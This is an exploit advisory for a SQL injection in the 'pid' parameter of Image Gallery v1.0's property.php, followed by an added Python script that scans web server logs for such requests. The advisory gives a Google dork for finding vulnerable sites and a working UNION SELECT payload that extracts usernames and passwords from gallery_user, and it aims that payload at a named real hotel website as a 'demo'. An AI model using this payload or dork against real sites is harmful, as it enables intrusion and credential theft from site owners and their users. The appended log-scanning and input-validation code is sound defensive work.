Image Gallery version 1.0 suffers from a remote SQL injection vulnerability.
Image Gallery v1.0 (pid) Remote SQL Injection Vulnerability
___________________________________
Author : Hussin X
Home : IQ-SecuriTY > www.IQ-TY.com
Mail : darkangel_G85@yahoo.com
___________________________________
script : http://www.elkagroup.com
DorK : "Powered by : elkagroup.com"
exploit :
_______
http://www.site.com/property.php?cid=12&uid=0&pid=-168+union+select+1,password,3,4,5,6,7,Username,9,10,11,12,13,14,15,16,17+FROM+gallery_user--
Demo :
_______
http://www.abbasihotel.com/gallery/property.php?cid=12&uid=0&pid=-168+union+select+1,password,3,4,5,6,7,Username,9,10,11,12,13,14,15,16,17+FROM+gallery_user--
Password encoding : mysql
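
Detection note (an added example, not part of the original advisory or the vendor's code): the script below scans web server access logs for requests to property.php whose cid, uid or pid value is not a plain integer, which is how the request shown above stands out. The combined log format, the integer-only rule for these parameters and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters of property.php that the advisory's URLs show carrying numeric ids.
NUMERIC_PARAMS = ("cid", "uid", "pid")
# Assumption: a legitimate id is a non-negative decimal integer.
VALID_ID = re.compile(r"[0-9]{1,10}")
# Client, request target and status from a common/combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def suspicious_params(target):
    """Return {param: decoded value} for id parameters that are not plain integers."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/property.php"):
        return {}
    bad = {}
    # parse_qsl decodes both %xx and '+', so encoded variants are normalised first.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in NUMERIC_PARAMS and not VALID_ID.fullmatch(value):
            bad[name.lower()] = value
    return bad

def scan(lines):
    """Return one finding per log line whose property.php ids fail validation."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        bad = suspicious_params(target)
        if bad:
            findings.append({"client": client, "status": int(status), "params": bad})
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /gallery/property.php?cid=12&uid=0&pid=168 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /gallery/property.php?cid=12&uid=0&pid=-168+union+select+1,password,3+FROM+gallery_user-- HTTP/1.1" 200 6230',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /gallery/property.php?cid=12&uid=0&pid=-168%20UNION%20SELECT%201 HTTP/1.1" 200 6230',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /gallery/index.php?pid=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only check applied in the application before the value reaches the query, together with a parameterized statement, closes the hole that this log scan only detects.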